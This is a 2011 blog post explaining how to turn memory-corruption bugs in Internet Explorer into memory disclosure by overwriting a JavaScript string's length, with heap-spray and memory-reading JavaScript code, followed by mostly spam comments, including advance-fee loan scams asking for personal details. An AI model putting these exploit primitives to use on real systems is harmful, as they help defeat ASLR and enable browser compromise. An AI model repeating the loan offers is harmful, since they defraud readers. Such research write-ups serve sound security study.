Thursday, June 9, 2011

Memory disclosure technique for Internet Explorer

Memory disclosure became an important part of exploit development in the light of various protection mechanisms. The ability to read memory holds multiple benefits for exploit developers. The most obvious one is, of course, the ability to circumvent ASLR - if we can read the content of the memory, we can determine the address of an module, for example by reading a vtable pointer of some object and subtracting a (constant) offset. However, memory disclosure brings additional benefits as well. For example, many exploits rely on a speciffic (predictable) memory layout. If we can read memory, we do not have to make any guesses regarding the memory layout. Thus, memory disclosure can also be used to improve the reliability of exploits and enable the exploit development in conditions where the memory layout is unpredictable.
One technique for memory desclosure was used by Peter Vreugdenhil in the Pwn2Own 2010 contest (http://vreugdenhilresearch.nl/Pwn2Own-2010-Windows7-InternetExplorer8.pdf). This technique consists of overwtiting a terminator of a string, which enables reading the memory immediately after the end of the string. This was enough to defeat ASLR, however, in general, it has a disadvantage that it can only read the memory up to the next null-character (that will be interpreted as the new string terminator). Additionally, there is no way to read past the end of currnet memory block (except if the next memory block begins immediately after the current block, with no unreadable memory in between).
The technique I propose here enables reading a much wider area of memory and also reading memory in other memory blocks, with unreadeable memory in between them. The technique itself is very simple, however, since I never saw anyone using or describing it, I decided to describe it here. I successfully used this technique in various exploits for Internet Explorer, most recently in an exploit for a vulnerability in Internet Explorer 8 on Windows 7.
The main idea of this technique is to overwrite the DWORD holding the length of a JavaScript string.


Background: JavaScript strings

JavaScript strings in Internet Explorer are stored in memory in the following form:


[string length in bytes][sequence of 16-bit characters]


So, for example, the string 'aaaa' will be stored as (hex):


08 00 00 00 61 00 61 00 61 00 61 00


If we overwrite the DWORD holding the string length, we can peek at the memory past the end of the string.
Assume we successfullty overwrote the length of string 'str'. By calling for example


mem = str.substr(offset/2,size/2);


we can obtain (in a string 'mem' of size 'size') the content of memory at address [address of str] + offset.
We can read any memory address provided that the offset+size is less than the new string length. Thus, the address we can read up to is only limited by the value we can overwrte string length with.


How to overwrite sting length?

The method we can use to overwrite string length will depend heavily on the vulnerablity we are exploiting. Here, I'll go through some of the most common vulnerability classes and show how they can be used to overwrite the length of a string.

1. Heap overflow: This is probably the simplest one. Allocate a string after the buffer you can overwrite. By overwriting the memory past the buffer, you'll also overwrite string length.

2. Double free: This consists of several steps: a) Free some object in memory, b) allocate a string in its place (make sure it has the same initial size as the deleted object), c) free the object again. Here we are exploiting the way how malloc and free work in windows: after a block is freed, its first DWORD will hold an address of the next free memory block of the same size or, if no such block exists, it will point back to the heap header. In both cases, the string lenght is overwritten with a large value.

3. Use-after-free: See if this vulnerability can be used to make double free. If it can, see point no. 2. If not, see if any property of the deleted object can be changed. If yes, try to allocate strings in memory so that the length of some string gets aligned with this property of the deleted object. Then change said property. Another way is to try to leverage the vulnerability into arbitrary memory address overwrite and see case no. 6.

4. Stack overflow: This is a difficult one, as JavaScript strings are allocated on the heap and not stack. However, note that stack overflow does not mean you absolutely have to overwrite the return address of the current function. Sometimes it is possible to overwrtite some address stored on the stack in between the buffer and the return address of the curent function and in this way leverage the the vulnerability into arbitrary memory address overwrite. If you can accomplish this, see case no. 6.

5. Integer overflow: This vulnerability class can be made to behave as either a) heap overflow (integer calculations are used to calculate the size of the buffer, in this case see case no. 1) or b) Arbitrary memory address overwrite (integer calculations are used to calculate the address of the buffer, in this case see case no. 6)

6. Arbitrary memory address overwrite: Many of the previous vulnerability classes (and many others, such as loop condition bugs) can be leveraged into arbitrary memory address overwrite. This case will be discussed in detail (with example code) in the next section.


Overwriting string length with arbitrary memory address overwrite

Suppose we have a JavaScript method OverwriteOffset(offset) that exploits some vulnerability to overwrite a memory at the address [address of some object]+offset with a large number. If we had a method OverwriteAbsolute(address) that overwrites the address 'address' with a large number, the analysis would be similar. However, since, in general, the first case is more difficult (as we don't know the absolute addresses) it will be discussed here.
The task in question is to use OverwriteOffset(offset) to overwrite the length of some string. However lets allso suppose that we don't know (and can't guess) the address (nor the offset) of any string.
In order to make things more predictable we will use heap spraying. So, suppose we made a heap spray that is stored in an array 'spray'. Each element of the array is a string with approximately 1MB size. Each such string will be allocated in a separate memory block of size 0x100000. We can use the following code to accomplish this.


spray = new Array(200);
var pattern = unescape("%uAAAA%uAAAA");
while(pattern.length<(0x100000/2)) pattern+=pattern;
pattern = pattern.substr(0,0x100000/2-0x100);
for(var i=0;i<200;i++) {
spray[i] = [inttostr(i)+pattern].join("");
}


The inttostr function used above converts an integer into four-byte string. This way, each string will contain its index in the first two characters. We'll come back to why I did this later.
With a heap spray as above we'll have a large probability that offset+0x100000*100 will fall somewhere in the spray. We don't know exactly where this address falls in our heap spray, however once we do the overwrite we can easily determine that as follows:

1. Overwrite a memory location somewhere in the sprayed part of the memory
2. Find out which sting we overwrote by comparing each string with its neighbor
3. Find out which characters in the string we overwrote by comparing string parts with what they originally contained. Use binary search and substr methods to speed up the process.
4. We can now calculate the offset of the string length. Overwrite the string length.

In JavaScript code, this would look like


var i;

//overwrite something in the heap spray
OverwriteOffset(0x100000*100);

//now find what and where exectly did we overwrite
readindex = -1;
for(i=1;i<200;i++) {
if(spray[0].substring(2,spray[0].length-2)!=spray[i].substring(2,spray[0].length-2)) {
readindex = i;
break;
}
}

if(readindex == -1) {
alert("Error overwriring first spray");
return 0;
}

//use binary search to find out the index of the character we overwrote
var start=2,len=spray[readindex].length-2,mid;
while(len>10) {
mid = Math.round(len/2);
mid = mid - mid%2;
if(spray[readindex].substr(start,mid) != spray[readindex-1].substr(start,mid)) {
len = mid;
} else {
start = start+mid;
len = len-mid;
}
}
for(i=start;i<(start+20);i=i+2) {
if(spray[readindex].substr(i,2) != spray[readindex-1].substr(i,2)) {
break;
}
}

//calculate the offset of the string length in memory
lengthoffset = 0x100000*100-i/2-1;
OverwriteOffset(lengthoffset);

//check if overwrite was successful
if(spray[readindex].length == spray[0].length) alert("error overwriting string length");




That's it, we can now read memory past the end of the string. For example, we could use the following function to read a DWORD at address [address of string]+offset


function ReadMem(offset) {
return strtoint(spray[readindex].substr(offset/2,2));
}


However, we would also like to determine the absolute address of the string, so instead of ofsets, we can provide absolute adresses to our ReadMem function. This will be discussed in the next section.


Determining the absolute address of the string

To determine the absolute address of the string we'll exploit the fact that each string in our heap spray is allocated in a separate memory block. We also know the size of such memory blocks (0x100000) and can assume that the next memory block comes immediately after the current one in memory.
Each memory block starts with a header. This header, among other things contains the address of the previous and the next memory block. So, memory block looks like:



[address of the next memory block][address of the previous memory block][24 bytes of some other header data][data]



So if we assume that the strings are placed in blocks in the following order


[block containing string 1][block containing string 2][block containing string 3] ...



we can determine the absolute address of the string in the following way, by reading the previous block pointer of the block that immediately follows the one that holds the ovrwritten string


readaddr = ReadMem(0x100000-0x20)+0x24;


This technique relies on the correct order of memory blocks. This order will usually be correct if the exploit is launched in a 'clean' Internte Explorer process (for example, if the exploit is opened in a new browser tab or window). However, in general, this does not have to be the case, so the memory could look like, for example


[block containing string 5][block containing string 7][block containing string 1] ...



However, although the order of blocks in memory may appear scrambled, the next block pointer of block containing string n will still point to the block containing string n+1. Similarly, the previous block pointer of block containing string n will still point to the block containing string n-1. Now remember that we made our heap spray so that each string contains its index in the first two characters. We can exploit this information to determine the correct absolute string address as follows:


var indexarray = new Array();
var tmpaddr = 0;
var i,index;

index = ReadMem(tmpaddr);
indexarray.push(index);

while(1) {
tmpaddr += 0x100000;
index = readmem(tmpaddr);
for(i=0;i<indexarray.length;i++) {
if(indexarray[i]==index+1) {
readaddr = readmem(tmpaddr-0x24)-i*0x100000+0x24;
return 1;
} else if(indexarray[i]==index-1) {
readaddr = readmem(tmpaddr-0x20)-i*0x100000+0x24;
return 1;
}
}
indexarray.push(index);
}



Finally, we can construct a function ReadMemAbsolute that reads content of a memory at absolute address as


function ReadMemAbsolute(address) {
return ReadMem(readaddr-address);
}


Helper string/integer conversion functions used throughout the code are given below.


function strtoint(str) {
return str.charCodeAt(1)*0x10000 + str.charCodeAt(0);
}

function inttostr(num) {
return String.fromCharCode(num%65536,Math.floor(num/65536));
}

119 comments:

Inducer said...

Excellent post! Helped me to better understand exploits and the techniques to create them.
I always wondered what a heap spray was used for!

Anonymous said...

Why use binary search to find the index of the changed byte? It still takes O(n) byte comparisons. Actually, this particular "binary search" seems to require O(n log n) comparisons. I may be missing something, but wouldn't a simple linear scan be faster?

Ivan Fratric said...

I don't think it would. Remember that you need to find the exact byte (or, in my case, DWORD) that was changed.
Theoretically, you could go DWORD by DWORD and examine if it was changed. This would be an O(n) algorithm, but this would also mean making several tens of millions JavaScript calls (one call for each possible DWORD). This would be very slow (espacially on IE8).
Instead I first find the string that was changed, next divide it in half and see which part was changed, then divide this part in two etc. Note that this is actually not an O(n*log(n)) algorithm (although it may appear so), but instead an O(n) algorithm (try and count the number of bytes examined, it is halved each time so you have n+n/2+n/4+n/8... = 2n-1). So it's also an O(n) algorithm, but it requires only O(log(n)) JavaScript calls.

robin hood said...

Interesting information I haven’t been through such information in a long time.
Visit Brand Message Manager

Michael Rodriguez said...

I suppose I've selected an unbelievable and interesting blog.
Visit CIAM

lucas kathy said...

Personally I think overjoyed I discovered the blogs. Relationships by Roll Up Miami

lucas kathy said...

Your articles support me a lot in all mediums of subjects. Welcome to Bank FTU Wachovia

lucas kathy said...

That’s a great site you folks have been carrying out there. Welcome to Hero Bio Diesel

kofi kingston said...

Each time I used to always check blog posts within the first hours in the break of day, because I like to get information increasingly more.rooting android

saranya zinavo said...

Hello! Thanks for the interesting inputs . Moreover , i really like your theme and the way you have organised your site .
Responsive Web Design companies in india

Stepney john said...

While the admin of the web site is working, no question soon it will likely be famous, due to its feature blogs.
english help online

saranya zinavo said...

this touched my heart… your words and her music. i am honored to have found you both
sunglasses for women

Cool boy said...

I'd purely tell you all “awesome information”
pirater un compte facebook

Joomkb said...

Great submit, very informative. I wonder why the opposite experts of this sector don’t understand this.


Ecommerce Designing Company

Web Design Company Bangalore said...

I like internet explorer. Thanks for sharing useful information about internet explorer. Website Developers Bangalore

chandru said...

Valuable information and excellent information you done here..I really enjoyed reading.Thanks for the post.Glass Stairs

jimmy disoza said...

Hi, just desired to let you know, I enjoyed this blog post. It had been funny. Carry on posting!Free Classified Ads Pakistan

Angelina Jullie said...

Enormous website along with attractive and exclusive materials whatever you need.
what would full coverage car insurance cost

Leigh Bolton said...

If you should be opting for finest contents like me, just visit this blog site daily because it provides the feature contents, thanks.
pay day loans

Samion Eric said...

If you should be opting for finest contents like me, just visit this blog site daily because it provides the feature contents, thanks.
flashback counter

anjila smith said...

Amazing information in this blog here that is truly glancing over the every aspects of topic. web application architecture

alex xavier said...

I loved reading your blog. It was very well authored and easy to understand...
Reclaimed Stone

anjila smith said...

The stuff written in the blogs have allured me!!! good infographics

anjila smith said...

The stuff written in the blogs have allured me!!! good infographics

Micheal Hussey said...

While the admin of the web site is working, no question soon it will likely be famous, due to its feature blogs.
infographic

Micheal Clark said...

I'm dotty for your best article writings and contents auspiciously.
infographic design

Johney Duke said...

It's been good to see your blog when I always look for such type of blogs. It’s great to discover the post here.
infographic design

David Otunga said...

You guys out there are performing an enormous job.
infographics design

Mike tyson said...

Amazing work pals, I really enjoy reading your interesting blogs.social media infographics

akon said...

The stuff in this blog is in not only incredible but also providing the great knowledge to the people. infographics design

Alisha Fox said...

I Never ever found such edifying blogs.
pay advance loans

Pocha huntas said...

Your writers have capability to make understand the users, great stuff you have provided to us.
whole life insurance

ALBERT LIET said...

The written piece is truly fruitful for me personally; continue posting these types of articles. infographic design

robin hood said...

Cool blog site friend I'm about to suggest this to all my listing contacts.good infographics

Gliter Jone said...

I think I have really come on the right place for getting the perfect info. http://bonville.org/

Timon berg said...

I'm in no doubt coming back again to read these articles and blogs.
auto insurance quote

Julie Johnson said...

Highly vigorous blog, I liked that much. car insurance quotes

Sir ackent said...

Remarkable blog! I have no words to praise, it has really allured me.
cheap auto insurance

stefhen fleming said...

I have spent a lot of the time in different blogs but this is really a unique blog for me. auto insurance quotes

Edythe Ortega said...

These articles have got absolute sense devoid of confusing the readers.
Ivy League tutoring

chandru said...

I found your post such a informative and useful post,thanks for sharing the post...
Distressed Oak Flooring

sileena jad said...

Very advisory and effective collection of stuff.
german tutoring

Julie Johnson said...

congratulations guys, quality information you have given!!! more

vey smith said...

Great blogs buddy……… this will definitely assist me.
online language tutor

Mickey James said...

Hi to everybody, here everyone is sharing such knowledge, so it’s fastidious to see this site, and I used to visit this blog daily.
How many solar panels do I need

Berta Hargrove said...

I love this blog because it is user friendly with appreciative information.
rp codes

Sheamus Warior said...

The blog is good enough, keep up writing such type of posts.
low rate payday loans

francis beth said...

This blog is further than my expectations. Nice work guys!!!
Your blogs and its stuff are so notable and worthwhile it can make me return.

francis beth said...

I have been dotty by reading your blog because it has a unique data.
online cash loan

Zachary Rizzuto said...

I read your blogs regularly. Your humoristic way is amusing, continue the good work!compare car insurance rates

Zachary Rizzuto said...

I read your blogs regularly. Your humoristic way is amusing, continue the good work!compare car insurance rates

robin hood said...

congratulations guys, quality information you have given!!! buy male extra

david zeck said...

congratulations guys, quality information you have given!!! aimbot battlefield 4

joy jenny said...

good article to read Web design coimbatore

Jhon peter said...

Great resourses.I really appreciate for posting such a great .

Web Designer Bangalore
Web Designing Company Bangalore

Alex Jones said...

I have been really impressed by going through this awesome blog. universal life insurance

Richard Sandberg said...

You have posted the blogs are really fantastic and informative.
http://bonville.org/

Joseph Cauley said...

congratulations guys, quality information you have given!!! eye-care system

Joseph Cauley said...

congratulations guys, quality information you have given!!! eye-care system

David Otunga said...

I'd purely tell you all “awesome information”
graviola tree cancer

ALBERT LIET said...

congratulations guys, quality information you have given!!! nemesis mechanical mod clone

rick hock said...

I suppose I've selected an unbelievable and interesting blog. ACLS Certification

Gliter Jone said...

I think I have really come on the right place for getting the perfect info. pirater un compte facebook

egeneration24 said...
This comment has been removed by the author.
Victor Silva said...

This info you provided in the blog that was really unique I love it!!! credit repair

robert pattinson said...

It so helpful.Really appreciate for posting this type of.stuf...
Website Designers Bangalore

Bale Hardy said...

Interesting blog..tx

Computer Rental in Chennai

youpak said...

Everyone will love the many types of cables in the market because it is very helpful. bubblegum casting

Manoj Kusshwaha said...

nice article very informative

Carla Dillon said...

congratulations guys, quality information you have given!!! glass balustrade brisbane

tina john said...

These articles and blogs are truly enough for me for a day. vietnam holiday

robin hood said...

Hi to all, the blog has really the dreadful information I really enjoyed a lot
steam wallet hacker

Dolph ziggler said...

I'd be trampled if all sites gave articles like these awesome articles.anonymous browsing

Mike tyson said...

Hi I was searching for the blogs for many times, now I have reached at the right place.Click Here

kingloin said...

Nice blog with awesome stuff!! Can you provide more information?? We are in fact waiting for you…


vietnam tour

Dolph ziggler said...

I actually found this blog and that is amazing thing I enjoy reading this easy to understand stuff. Keep it up.bubblegum casting

stephin bell said...

I'd be trampled if all sites gave articles like these awesome articles. dwi in ny

sir kodak said...

The stuff written in the blogs have allured me!!! ny criminal defense lawyer

saim disoza said...

Your way to enlighten everything on this blog is actually pleasant, everyone manage to efficiently be familiar with it, Thanks a great deal.0green coffee bean extract reviews

ncie view said...

I wanna thanks to a great extent for providing such informative and qualitative material therefore often.


VLC Media Player

only one said...

I hope you will share such type of impressive contents again with us so that we can utilize it and get more advantage.

free open source ftp client

Artur Wójcik said...

congratulations guys, quality information you have given. See here: rosetta stone activation code

Angel sky said...

Whatever you have provided for us in these posts really appreciative.

best security system

Dolph ziggler said...

The stuff written in the blogs have allured me!!! green coffee bean extract

nice name said...

Thanks for your beyond belief blogs stuff.
ny central booking

ramas samar said...

I desire lots of articles and blogs please upload soon.

queens central booking

Richard Sandberg said...

I’m sure you will provide the more awesome blogs like these blogs that I’ve enjoyed a lot.
ny central booking

jhon cena said...

Nice answers in replace of the question with real point of view and explaining about that.book a apartment marrakech

divya chirsty said...

Nice Blog..very effective and your view point is really good..
Website Development Company Bangalore

kent clark said...

The blog and data is excellent and informative as well. How to Get Hulu Plus For Free

kent clark said...

You posting are wonderful and informative. Medical Negligence

kent clark said...

You guys make it really easy for all the folks out there. best watch brands

Jones Henry said...

I wonder why other professionals don’t notice your website much m glad I found this. best dating advice

kent clark said...

Info is out of this world, I would bang to see more from your writers. best remington electric shavers

90ououoi said...

I’m surely coming again to read these articles and blogs one time password

Lisa John said...

A huge round of applause, keep it up. playground markings

andin zandinzahra said...

I wonder why other professionals don’t notice your website much m glad I found this. Perlindungan Asuransi Kesehatan - Commonwealth Life

rcasparepart said...

Hello there, just became aware of your blog through Google, and found that it is truly informative. I am gonna watch out for brussels. I will appreciate if you continue this in future. Numerous people will be benefited from your writing. Cheers!

pesan undangan unik
undangan
undangan kipas
souvenir pernikahan unik
contoh undangan pernikahan
undangan pernikahan
undangan nikah

Joomkb said...

I liked this article. It was so great.
Ecommerce Website Development Company | Magento Website Designing Company

Mrs Sharon Sim said...

Hello Everybody,
My name is Mrs Sharon Sim. I live in singapore and i am a happy woman today? and i told my self that any lender that rescue my family from our poor situation, i will refer any person that is looking for loan to him, he gave me happiness to me and my family, i was in need of a loan of S$250,000.00 to start my life all over as i am a single mother with 3 kids I met this honest and GOD fearing man loan lender that help me with a loan of S$250,000.00 SG. Dollar, he is a GOD fearing man, if you are in need of loan and you will pay back the loan please contact him tell him that is Mrs Sharon, that refer you to him. contact Dr Purva Pius,via email:(urgentloan22@gmail.com) +918376918351 Thank you.

Mrs.Irene Query said...

How I Got My Loan From A Genuine And Reliable Loan Company

Hello Everybody,
My name is Mrs.Irene Query. I live in Philippines and i am a happy woman today? and i told my self that any lender that rescue my family from our poor situation, i will refer any person that is looking for loan to him, he gave me happiness to me and my family, i was in need of a loan of $150,000.00 to start my life all over as i am a single mother with 2 kids I met this honest and GOD fearing man loan lender that help me with a loan of$150,000.00 US. Dollar, he is a GOD fearing man, if you are in need of loan and you will pay back the loan please contact him tell him that is Mrs.Irene Query, that refer you to him. contact Dr Purva Pius,via email:(urgentloan22@gmail.com) Thank you.


1. Your Full names:_______
2. Contact address:_______
3. Country Of Residence:______
4. Loan Amount Required:________
5. Duration:_____
6. Gender:_____
7. Occupation:________
8. Monthly Income:_______
9. Date Of Birth:________
10.Telephone Number:__________

Regards.
Managements
Email Us: urgentloan22@gmail.com

Rose Maria said...

what is virtual memory in computer?
memory techniques

Dr Purva Pius said...

Hello Everybody,
My name is Mrs Sharon Sim. I live in Singapore and i am a happy woman today? and i told my self that any lender that rescue my family from our poor situation, i will refer any person that is looking for loan to him, he gave me happiness to me and my family, i was in need of a loan of S$250,000.00 to start my life all over as i am a single mother with 3 kids I met this honest and GOD fearing man loan lender that help me with a loan of S$250,000.00 SG. Dollar, he is a GOD fearing man, if you are in need of loan and you will pay back the loan please contact him tell him that is Mrs Sharon, that refer you to him. contact Dr Purva Pius,via email:(urgentloan22@gmail.com) Thank you.

BORROWERS APPLICATION DETAILS


1. Name Of Applicant in Full:……..
2. Telephone Numbers:……….
3. Address and Location:…….
4. Amount in request………..
5. Repayment Period:………..
6. Purpose Of Loan………….
7. country…………………
8. phone…………………..
9. occupation………………
10.age/sex…………………
11.Monthly Income…………..
12.Email……………..

Regards.
Managements
Email Kindly Contact: urgentloan22@gmail.com

Orientation business said...

nice blog really impressed with your blog..

hr consultancy | head hunting |
HR Consultant | recruitment executive search
| human resource management consultancy

Dr Aliu Shadira said...

$$$ GENUINE LOAN WITH 3% INTEREST RATE APPLY $$$.
Are you in need of a Loan to pay off your debt and start a new life? You have come to the right place were you can get your loan at a very low interest rate. Interested people/company should please contact us via email for more details.

E-mail: shadiraaliuloancompany1@gmail.com

Dr Purva Pius said...

Hello Everybody,
My name is Mrs Sharon Sim. I live in Singapore and i am a happy woman today? and i told my self that any lender that rescue my family from our poor situation, i will refer any person that is looking for loan to him, he gave me happiness to me and my family, i was in need of a loan of S$250,000.00 to start my life all over as i am a single mother with 3 kids I met this honest and GOD fearing man loan lender that help me with a loan of S$250,000.00 SG. Dollar, he is a GOD fearing man, if you are in need of loan and you will pay back the loan please contact him tell him that is Mrs Sharon, that refer you to him. contact Dr Purva Pius,via email:(urgentloan22@gmail.com) Thank you.

BORROWERS APPLICATION DETAILS


1. Name Of Applicant in Full:……..
2. Telephone Numbers:……….
3. Address and Location:…….
4. Amount in request………..
5. Repayment Period:………..
6. Purpose Of Loan………….
7. country…………………
8. phone…………………..
9. occupation………………
10.age/sex…………………
11.Monthly Income…………..
12.Email……………..

Regards.
Managements
Email Kindly Contact: urgentloan22@gmail.com

Dr Purva Pius said...

Hello Everybody,
My name is Mrs Sharon Sim. I live in Singapore and i am a happy woman today? and i told my self that any lender that rescue my family from our poor situation, i will refer any person that is looking for loan to him, he gave me happiness to me and my family, i was in need of a loan of S$250,000.00 to start my life all over as i am a single mother with 3 kids I met this honest and GOD fearing man loan lender that help me with a loan of S$250,000.00 SG. Dollar, he is a GOD fearing man, if you are in need of loan and you will pay back the loan please contact him tell him that is Mrs Sharon, that refer you to him. contact Dr Purva Pius,via email:(urgentloan22@gmail.com) Thank you.

BORROWERS APPLICATION DETAILS


1. Name Of Applicant in Full:……..
2. Telephone Numbers:……….
3. Address and Location:…….
4. Amount in request………..
5. Repayment Period:………..
6. Purpose Of Loan………….
7. country…………………
8. phone…………………..
9. occupation………………
10.age/sex…………………
11.Monthly Income…………..
12.Email……………..

Regards.
Managements
Email Kindly Contact: urgentloan22@gmail.com

Dr Purva Pius said...

Hello Everybody,
My name is Mrs Sharon Sim. I live in Singapore and i am a happy woman today? and i told my self that any lender that rescue my family from our poor situation, i will refer any person that is looking for loan to him, he gave me happiness to me and my family, i was in need of a loan of S$250,000.00 to start my life all over as i am a single mother with 3 kids I met this honest and GOD fearing man loan lender that help me with a loan of S$250,000.00 SG. Dollar, he is a GOD fearing man, if you are in need of loan and you will pay back the loan please contact him tell him that is Mrs Sharon, that refer you to him. contact Dr Purva Pius,via email:(urgentloan22@gmail.com) Thank you.

BORROWERS APPLICATION DETAILS


1. Name Of Applicant in Full:……..
2. Telephone Numbers:……….
3. Address and Location:…….
4. Amount in request………..
5. Repayment Period:………..
6. Purpose Of Loan………….
7. country…………………
8. phone…………………..
9. occupation………………
10.age/sex…………………
11.Monthly Income…………..
12.Email……………..

Regards.
Managements
Email Kindly Contact: urgentloan22@gmail.com

تاریخ اسلام said...

https://www.quester.pk/question/can-we-commit-suicide-by-holding-breath/
https://www.quester.pk/question/which-animal-has-bigger-eyes-than-brain/
https://www.quester.pk/question/which-animal-has-longest-lifespan/
https://www.quester.pk/question/does-ufone-have-3g-coverage-in-yazman/
https://www.quester.pk/question/does-ufone-have-3g-coverage-in-wazirabad/

Moorthy Machendran said...

I think this is great! Looking forward to seeing your mark of future releases!
Best Web Company in India |
Top 5 VPS Hosting in India |
Top 5 Shared Hosting in India

Loan said...

Hello Everybody,
My name is Mrs Sharon Sim. I live in Singapore and i am a happy woman today? and i told my self that any lender that rescue my family from our poor situation, i will refer any person that is looking for loan to him, he gave me happiness to me and my family, i was in need of a loan of S$250,000.00 to start my life all over as i am a single mother with 3 kids I met this honest and GOD fearing man loan lender that help me with a loan of S$250,000.00 SG. Dollar, he is a GOD fearing man, if you are in need of loan and you will pay back the loan please contact him tell him that is Mrs Sharon, that refer you to him. contact Dr Purva Pius,via email:(abubakarloanservice@gmail.com) Thank you.

BORROWERS APPLICATION DETAILS


1. Name Of Applicant in Full:……..
2. Telephone Numbers:……….
3. Address and Location:…….
4. Amount in request………..
5. Repayment Period:………..
6. Purpose Of Loan………….
7. country…………………
8. phone…………………..
9. occupation………………
10.age/sex…………………
11.Monthly Income…………..
12.Email……………..

Regards.
Managements
Email Kindly Contact: abubakarloanservice@gmail.com
Reply

Mrs Sharon Sim said...

Hello Everybody,
My name is Mrs Sharon Sim. I live in Singapore and i am a happy woman today? and i told my self that any lender that rescue my family from our poor situation, i will refer any person that is looking for loan to him, he gave me happiness to me and my family, i was in need of a loan of S$250,000.00 to start my life all over as i am a single mother with 3 kids I met this honest and GOD fearing man loan lender that help me with a loan of S$250,000.00 SG. Dollar, he is a GOD fearing man, if you are in need of loan and you will pay back the loan please contact him tell him that is Mrs Sharon, that refer you to him. contact Dr Purva Pius,via email:(urgentloan22@gmail.com) Thank you.

klain leo said...

I am a private loan lender which have all take to be a genuine lender i give out the best loan to my client at a very convenient rate.The interest rate of this loan is 3%.i give out loan to public and private individuals.the maximum amount i give out in this loan is $1,000,000.00 USD why the minimum amount i give out is 5000.for more information contact us email honestloan10@gmail.com
Your Full Details:
Full Name :………
Country :………….
state:………….
Sex :………….
Address............
Tel :………….
Occupation :……..
Amount Required :…………
Purpose of the Loan :……..
Loan Duration :…………
Phone Number :………
Contact email:honestloan10@gmail.com
Website;http://honestloan.ulcraft.com/

max william said...

Do you need Finance?
Are you looking for Finance?
Are you looking for a money to enlarge your business?
We help individuals and companies to obtain loan for business
expanding and to setup a new business ranging any amount. Get a loan at affordable interest rate of 3%, Do you need this cash/loan for business and to clear your bills? Then send us an email now for more information contact us now via Email:maxcreditfinance@googlemail.com

Yasir Jamal said...

I just found your blog and want to say thank you! What an enjoyable time looking
through so many sites. Thanks for sharing.

Web design company dubai

APJ Cabs said...

This Is Good Information To All.

Rent A Car In chennai

Credit Loan said...

My Brothers and Sister all over the world, I am Mrs Boo Wheat from Canada ; i was in need of loan some month ago. i needed a loan to open my restaurant and bar, when one of my long time business partner introduce me to this good and trustful loan lender DR PURVA PIUS that help me out with a loan, and is interest rate is very low , thank God today. I am now a successful business woman, and I became useful. In the life of others, I now hold a restaurant and bar. And about 30 workers, thank GOD for my life I am leaving well today a happy father with three kids, thanks to you DR PURVA PIUS Now I can take care of my lovely family, i can now pay my bill. I am now the bread winner of my family. If you are look for a trustful and reliable loan leader. You can Email him via,mail (urgentloan22@gmail.com) Please tell him Mrs Boo Wheat from Canada introduce you to him. THANKS

Isabella Tyson said...

Testimony on how i got my LOAN from fundingloanplc@yahoo.com ...

I'm Isabella Tyson from 1910 N Halsted St Unit 3, Chicago IL60614 USA,, i have been searching for a genuine loan company for the past few months and all i got was bunch of scams who made me to trust them and at the end of the day took my money without giving anything in return, all hope was lost i got confused and frustrated, i find it very difficult to feed my family and vowed never to have anything to do with loan companies on net and went to seek of assistance from a very good friend which i explained all my experience regarding online companies with and said he can help me that he knows of a Godsent and well known company called FUNDING CIRCLE PLC, he stated he just got a loan from them although i was still very unsure about this company due to my past experience but i decided to give it a try and did as i was directed by my friend and applied, i never believed but i tried and to my greatest surprise i received my loan in my bank account within 24 hours, i could not believe that i would stand on my feet financially again. I’m glad I took the risk and applied for the loan and today i'm thanking God that such loan companies still exist and promise to share the good news to people who are in need of financial assistance because the rate of scams on net is getting very serious and i don't want people to fall victim when we still have genuine and Godsent lenders.. You can contact this Godsent company using the information as stated and be a partaker of this great testimony.. Email: fundingloanplc@yahoo.com OR Call/Text +14067326622 thanks


osma raheem. said...

Hello Everybody,
My name is Ahmad Asnul Brunei, I contacted Mr Osman Loan Firm for a business loan amount of $250,000, Then i was told about the step of approving my requested loan amount, after taking the risk again because i was so much desperate of setting up a business to my greatest surprise, the loan amount was credited to my bank account within 24 banking hours without any stress of getting my loan. I was surprise because i was first fall a victim of scam! If you are interested of securing any loan amount & you are located in any country, I'll advise you can contact Mr Osman Loan Firm via email osmanloanserves@gmail.com

LOAN APPLICATION INFORMATION FORM
First name......
Middle name.....
2) Gender:.........
3) Loan Amount Needed:.........
4) Loan Duration:.........
5) Country:.........
6) Home Address:.........
7) Mobile Number:.........
8) Email address..........
9) Monthly Income:.....................
10) Occupation:...........................
11)Which site did you here about us.....................
Thanks and Best Regards.
Derek Email osmanloanserves@gmail.com